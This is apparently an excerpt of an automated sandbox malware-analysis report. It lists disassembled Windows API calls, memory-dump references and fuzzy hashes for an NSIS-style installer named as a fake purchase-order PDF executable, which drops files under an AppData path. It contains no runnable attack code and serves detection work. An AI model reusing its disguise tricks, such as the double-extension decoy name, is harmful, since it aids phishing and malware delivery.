                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C4E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                    • Instruction ID: 59cc3d86ab4e26752c0bcc3731729734fb3652f4f3e26a658c09c1975061a851
                                    • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                    • Instruction Fuzzy Hash: B6D0A932004021ABC2002728AE0888BBB50DB00270702CA35FDA4A22B1DB300C969A98
                                    APIs
                                    • CreateDirectoryA.KERNELBASE(?,00000000,00403305,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405731
                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 0040573F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast
                                    • String ID:
                                    • API String ID: 1375471231-0
                                    • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                    • Instruction ID: fe143fb7e2c59eb3603aebef79fe73c29c1fae3f16fa91b3bf8fea648d0a9a1d
                                    • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                    • Instruction Fuzzy Hash: 61C04C30604505EFD7515B209E09B177A94AB50781F15443DA146E10A0DF388455ED2D
                                    APIs
                                    • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405F9E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                    • Instruction ID: 3407ec1d177fcaed837adfb77f9546191d1251c49c384e54d899e6c75a5c0df7
                                    • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                    • Instruction Fuzzy Hash: FEE0E6B211460ABEDF195F50DC0AD7B371DEB04304F10452EF916D5150E6B5ED305A75
                                    APIs
                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,00403295,00000000,004138E0,00000020,004138E0,00000020,000000FF,00000004,00000000), ref: 00405D15
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                    • Instruction ID: 9463c3abe6280d084d74f54212381f1c7099d27a46d02ce49af031ea16a2316f
                                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                    • Instruction Fuzzy Hash: 8BE0E63251065DABEF105F55AC04AEB775CEF15350F008437F955E3150D671E8619BA4
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032C7,00000000,00000000,00403124,000000FF,00000004,00000000,00000000,00000000), ref: 00405CE6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                    • Instruction ID: 0f3a91911b7368544d0479776f9460b67210371169305fae4b72b28e49471388
                                    • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                    • Instruction Fuzzy Hash: 56E0EC3221835EEBEF109E559C04EEB7B6CEB05360F044437FD5AE2150D671E861ABA4
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FD5,?,?,?,?,00000002,: Completed), ref: 00405F6B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: Open
                                    • String ID:
                                    • API String ID: 71445658-0
                                    • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                    • Instruction ID: fced92d9612f5b6fa1e6e2d4533c029b8c19dcfe99612180af7d1277f5ba7959
                                    • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                    • Instruction Fuzzy Hash: 50D0123200420EBBDF115FA0DD01FAB3B2DEB08310F104426FE19A41A1D776D534AB68
                                    APIs
                                    • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 6ea72789876617956ed8302146c0b1e26734f13240b670772ec2fbc4b9299356
                                    • Instruction ID: adf9f1d0f226d6aaac26ddfaf32565b622f8b9720054a2fce7727e4bbd6f8915
                                    • Opcode Fuzzy Hash: 6ea72789876617956ed8302146c0b1e26734f13240b670772ec2fbc4b9299356
                                    • Instruction Fuzzy Hash: 5CD01232704115DBDB10EFA59B0869E73A5EB40325B318277E111F21D1D6B9C9469A2D
                                    APIs
                                    • SendMessageA.USER32(00010434,00000000,00000000,00000000), ref: 004041A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 9a349a504fb0886c84c083efb4d5a0f9bf7be7ebc5d16bd7850478614cc17ce1
                                    • Instruction ID: 08778a02c31aee6c5ab49ec4881ce5c4c543093ca08d36e97cfe9cc2b9e67ff3
                                    • Opcode Fuzzy Hash: 9a349a504fb0886c84c083efb4d5a0f9bf7be7ebc5d16bd7850478614cc17ce1
                                    • Instruction Fuzzy Hash: BCC04CB57446017FEA208B609D49F0677686750701F2544297250B60D0C6B8D460D61C
                                    APIs
                                    • SendMessageA.USER32(00000028,?,00000001,00403FAA), ref: 00404188
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 4b8775389032d73bb0cdc78c7cec40c6840668cae09c009f0c0f7bab9180220a
                                    • Instruction ID: 12fa0bd368318515ea3e07217fdd1357908c491f7ba982cdf3d5e787ac9e46f9
                                    • Opcode Fuzzy Hash: 4b8775389032d73bb0cdc78c7cec40c6840668cae09c009f0c0f7bab9180220a
                                    • Instruction Fuzzy Hash: C5B09236284A00ABDE218B10DE09F457AA2E7A8742F028028B240240B0CAB200A1EB08
                                    APIs
                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 004032D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                    • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                    • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                    • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                    APIs
                                    • ShellExecuteExA.SHELL32(?,0040458C,?), ref: 004057B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID:
                                    • API String ID: 587946157-0
                                    • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                    • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                                    • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                                    • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(?,00403F43), ref: 00404171
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 36152b0dcf1d80259a477477ce8a6ba5700b6154f7d802f5e94468563093d619
                                    • Instruction ID: f56e5b77852c123102009bf48c8e97640dd16861c460b72fc417a08543d31c29
                                    • Opcode Fuzzy Hash: 36152b0dcf1d80259a477477ce8a6ba5700b6154f7d802f5e94468563093d619
                                    • Instruction Fuzzy Hash: 5AA01132000000AFCA02AB80EF08C0ABBB2ABA8300B008838A280800328B322820EB08
                                    APIs
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                      • Part of subcall function 004051E8: lstrcatA.KERNEL32(Completed,00403208,00403208,Completed,00000000,004178E0,00000000), ref: 00405244
                                      • Part of subcall function 004051E8: SetWindowTextA.USER32(Completed,Completed), ref: 00405256
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                      • Part of subcall function 00405760: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422530,Error launching installer), ref: 00405789
                                      • Part of subcall function 00405760: CloseHandle.KERNEL32(?), ref: 00405796
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                      • Part of subcall function 0040653F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406550
                                      • Part of subcall function 0040653F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406572
                                      • Part of subcall function 0040601F: wsprintfA.USER32 ref: 0040602C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                    • String ID:
                                    • API String ID: 2972824698-0
                                    • Opcode ID: dbeebba37fa8cf09fdc9dc7ae3d0824b2dbe91a827b4f06a01590cc80006a158
                                    • Instruction ID: ab3a9b43a985bc50e50b80971c885d2a388c20ea92acf5f38ac8150a392b42a1
                                    • Opcode Fuzzy Hash: dbeebba37fa8cf09fdc9dc7ae3d0824b2dbe91a827b4f06a01590cc80006a158
                                    • Instruction Fuzzy Hash: F1F0BB31905121DBCB20BF659D849DF72A4DF41315B25423FF101B61D1CB7C4D42566E
                                    APIs
                                    • GetDlgItem.USER32(?,000003FB), ref: 00404626
                                    • SetWindowTextA.USER32(00000000,?), ref: 00404650
                                    • SHBrowseForFolderA.SHELL32(?,00420100,?), ref: 00404701
                                    • CoTaskMemFree.OLE32(00000000), ref: 0040470C
                                    • lstrcmpiA.KERNEL32(: Completed,nsvis Setup: Completed), ref: 0040473E
                                    • lstrcatA.KERNEL32(?,: Completed), ref: 0040474A
                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040475C
                                      • Part of subcall function 004057C1: GetDlgItemTextA.USER32(?,?,00000400,00404793), ref: 004057D4
                                      • Part of subcall function 0040639C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 004063F4
                                      • Part of subcall function 0040639C: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406401
                                      • Part of subcall function 0040639C: CharNextA.USER32(?,"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406406
                                      • Part of subcall function 0040639C: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,004032ED,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00406416
                                    • GetDiskFreeSpaceA.KERNEL32(0041FCF8,?,?,0000040F,?,0041FCF8,0041FCF8,?,00000001,0041FCF8,?,?,000003FB,?), ref: 0040481A
                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404835
                                      • Part of subcall function 0040498E: lstrlenA.KERNEL32(nsvis Setup: Completed,nsvis Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                                      • Part of subcall function 0040498E: wsprintfA.USER32 ref: 00404A34
                                      • Part of subcall function 0040498E: SetDlgItemTextA.USER32(?,nsvis Setup: Completed), ref: 00404A47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                    • String ID: : Completed$>%{$A$C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets$nsvis Setup: Completed
                                    • API String ID: 2624150263-1442445898
                                    • Opcode ID: e6e408a563ecea602c0a6dfa5c805507a5dd8bebb4c2c52a138c8c5013cba04b
                                    • Instruction ID: 23887ea06715a98946f15fa8ab5ee03a9679ba0c83a6df36e4e3dfda0b9dc378
                                    • Opcode Fuzzy Hash: e6e408a563ecea602c0a6dfa5c805507a5dd8bebb4c2c52a138c8c5013cba04b
                                    • Instruction Fuzzy Hash: C9A183B1900209ABDB11EFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B69
                                    APIs
                                    • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                    Strings
